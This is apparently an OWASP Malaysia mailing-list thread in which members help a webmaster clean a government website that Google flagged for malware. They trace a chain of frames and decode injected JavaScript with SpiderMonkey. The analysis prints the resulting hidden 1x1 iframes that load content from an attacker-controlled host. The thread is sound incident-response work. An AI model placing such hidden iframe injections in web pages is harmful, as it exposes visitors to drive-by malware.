Please check how the line got injected into your system. You need to find the source of the problem to make sure it will not happen again.
On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote: > Mr Adnan thanks for the info and guide.. > > I have clean all the mess and the site is up and running again.. > > thanks to all too.. > > ** I will blog this so others can make it as a guide... > > > On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor < > [email protected]> wrote: > >> mamp <= LOL typo.. it should be nano >> js <= one of hte binary in Spidermonkey. get the patched version >> http://blog.didierstevens.com/programs/spidermonkey/ and if you are >> working on MacOS/Darwin, apply this patch >> >> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/ >> >> thanks >> >> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan >> <[email protected]> wrote: >> > I can see 2 interesting apps/scripts: >> > >> > 1. mamp >> > 2. /opt/analysis/js/js >> > >> > care to share? hopefully it is open source ;) >> > >> > >> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor >> > <[email protected]> wrote: >> >> >> >> Here is my bash history: >> >> >> >> xanda:tmp adnan$ history >> >> <snip> >> >> 500 cd /tmp >> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php >> >> 502 wget http://www2.pkink.gov.my/indexsedc.php >> >> 503 nano indexsedc.php >> >> 504 wget http://www2.pkink.gov.my/indexsedc.php >> >> 505 mamp indexsedc.php.1 >> >> 506 nano indexsedc.php.1 >> >> 507 wget http://www2.pkink.gov.my/sedc.php >> >> 508 nano sedc.php >> >> 509 wget http://www2.pkink.gov.my/default.php >> >> 510 nano default.php >> >> 511 nano default.php >> >> 512 clear >> >> <I've remove tags and leave clean JavaScript inside> >> >> 513 mv default.php default.txt >> >> 514 /opt/analysis/js/js < default.txt >> >> 515 cat write.log >> >> 516 history >> >> xanda:tmp adnan$ >> >> >> >> Below is the output of the cat: >> >> [output] >> >> xanda:tmp adnan$ cat write.log >> >> <iframe width="1" height="1" >> >> >> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> "></iframe>"<iframe >> >> width="1" height="1" >> >> >> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> "></iframe>" >> >> [/output] >> >> >> >> >> >> Hint: you might use modified version of spidermonkey to 'understand' >> >> the javascript >> >> >> >> Thanks >> >> >> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote: >> >> > thanks for the info.. >> >> > i will check all the file. >> >> > >> >> > how you found it? >> >> > >> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor >> >> > <[email protected]> wrote: >> >> >> >> >> >> Here is the flow: >> >> >> >> >> >> 1) your indexsedc.php has an iframe to sedc.php >> >> >> 2) and your sedc.php has an iframe to default.php >> >> >> 3) and in default.php (look at the last 2 lines), javascript will >> >> >> actually create an iframe to >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> >> >> >> >> >> thanks :) >> >> >> >> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> >> wrote: >> >> >> > can you point... >> >> >> > my index.htm or indexsedc.php or other file? >> >> >> > >> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor >> >> >> > <[email protected]> wrote: >> >> >> >> >> >> >> >> you have iframe pointed to >> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> >> >> >> >> >> >> >> which is not xss :) >> >> >> >> >> >> >> >> >From my personal point of view, its either caused by: >> >> >> >> 1) malware on pc which has been used for ftp/access to the server >> >> >> >> 2) compromised server >> >> >> >> >> >> >> >> you can send your access.log to [email protected] or >> >> >> >> [email protected] for further analysis :) >> >> >> >> >> >> >> >> thanks >> >> >> >> >> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> >> wrote: >> >> >> >> > I have check it. >> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected] >> > >> >> >> >> > wrote: >> >> >> >> >> >> >> >> >> >> Hi Mohd Symsuri, >> >> >> >> >> >> >> >> >> >> Why dont you check on the reason why its being blocked, it >> might >> >> >> >> >> help. >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 >> >> >> >> >> >> >> >> >> >> Regards, >> >> >> >> >> Kishur >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri >> >> >> >> >> <[email protected]> >> >> >> >> >> wrote: >> >> >> >> >>> >> >> >> >> >>> Assalamualikum and Good day for my fellow friends. >> >> >> >> >>> I need some advise. >> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan >> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for >> almost >> >> >> >> >>> 4 >> >> >> >> >>> days. >> >> >> >> >>> It said that we host malware on our server Malware Detected! >> ( >> >> >> >> >>> Google >> >> >> >> >>> said that!!) >> >> >> >> >>> What i did is.. >> >> >> >> >>> 1. Scan all the data and upload a new data >> >> >> >> >>> 2. Check the index.html or index.php >> >> >> >> >>> 3. Scan using web scanner using >> >> >> >> >>> http://www.avgthreatlabs.com/ >> >> >> >> >>> http://www.virustotal.com >> >> >> >> >>> but still get block.. >> >> >> >> >>> Googel said Suspected injected code >> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; >> >> >> >> >>> NAME="confcontent" >> >> >> >> >>> scrolling=yes > >> >> >> >> >>> I have using this code for almost 2 years >> >> >> >> >>> What should i do now? >> >> >> >> >>> >> >> >> >> >>> -- >> >> >> >> >>> best regard >> >> >> >> >>> syamsuri >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> _______________________________________________ >> >> >> >> >>> Owasp-Malaysia mailing list >> >> >> >> >>> [email protected] >> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >>> >> >> >> >> >>> OWASP Malaysia Wiki >> >> >> >> >>> http://www.owasp.org/index.php/Malaysia >> >> >> >> >>> >> >> >> >> >>> OWASP Malaysia Wiki Facebook >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> _______________________________________________ >> >> >> >> >> Owasp-Malaysia mailing list >> >> >> >> >> [email protected] >> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > -- >> >> >> >> > best regard >> >> >> >> > syamsuri >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > _______________________________________________ >> >> >> >> > Owasp-Malaysia mailing list >> >> >> >> > [email protected] >> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> > >> >> >> >> > OWASP Malaysia Wiki >> >> >> >> > http://www.owasp.org/index.php/Malaysia >> >> >> >> > >> >> >> >> > OWASP Malaysia Wiki Facebook >> >> >> >> > >> >> >> >> > >> >> >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> > >> >> >> >> _______________________________________________ >> >> >> >> Owasp-Malaysia mailing list >> >> >> >> [email protected] >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> >> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> > >> >> >> > >> >> >> > >> >> >> > -- >> >> >> > best regard >> >> >> > syamsuri >> >> >> > >> >> >> > >> >> >> > >> >> >> > _______________________________________________ >> >> >> > Owasp-Malaysia mailing list >> >> >> > [email protected] >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> > >> >> >> > OWASP Malaysia Wiki >> >> >> > http://www.owasp.org/index.php/Malaysia >> >> >> > >> >> >> > OWASP Malaysia Wiki Facebook >> >> >> > >> >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> > >> >> >> _______________________________________________ >> >> >> Owasp-Malaysia mailing list >> >> >> [email protected] >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> > >> >> > >> >> > >> >> > -- >> >> > best regard >> >> > syamsuri >> >> > >> >> > >> >> > >> >> > _______________________________________________ >> >> > Owasp-Malaysia mailing list >> >> > [email protected] >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> > >> >> > OWASP Malaysia Wiki >> >> > http://www.owasp.org/index.php/Malaysia >> >> > >> >> > OWASP Malaysia Wiki Facebook >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> > >> >> _______________________________________________ >> >> Owasp-Malaysia mailing list >> >> [email protected] >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> OWASP Malaysia Wiki >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > >> > >> > >> > -- >> > Sharuzzaman Ahmat Raslan >> > >> > _______________________________________________ >> > Owasp-Malaysia mailing list >> > [email protected] >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> > >> > OWASP Malaysia Wiki >> > http://www.owasp.org/index.php/Malaysia >> > >> > OWASP Malaysia Wiki Facebook >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > > > > -- > best regard > syamsuri > > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > -- Sharuzzaman Ahmat Raslan
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
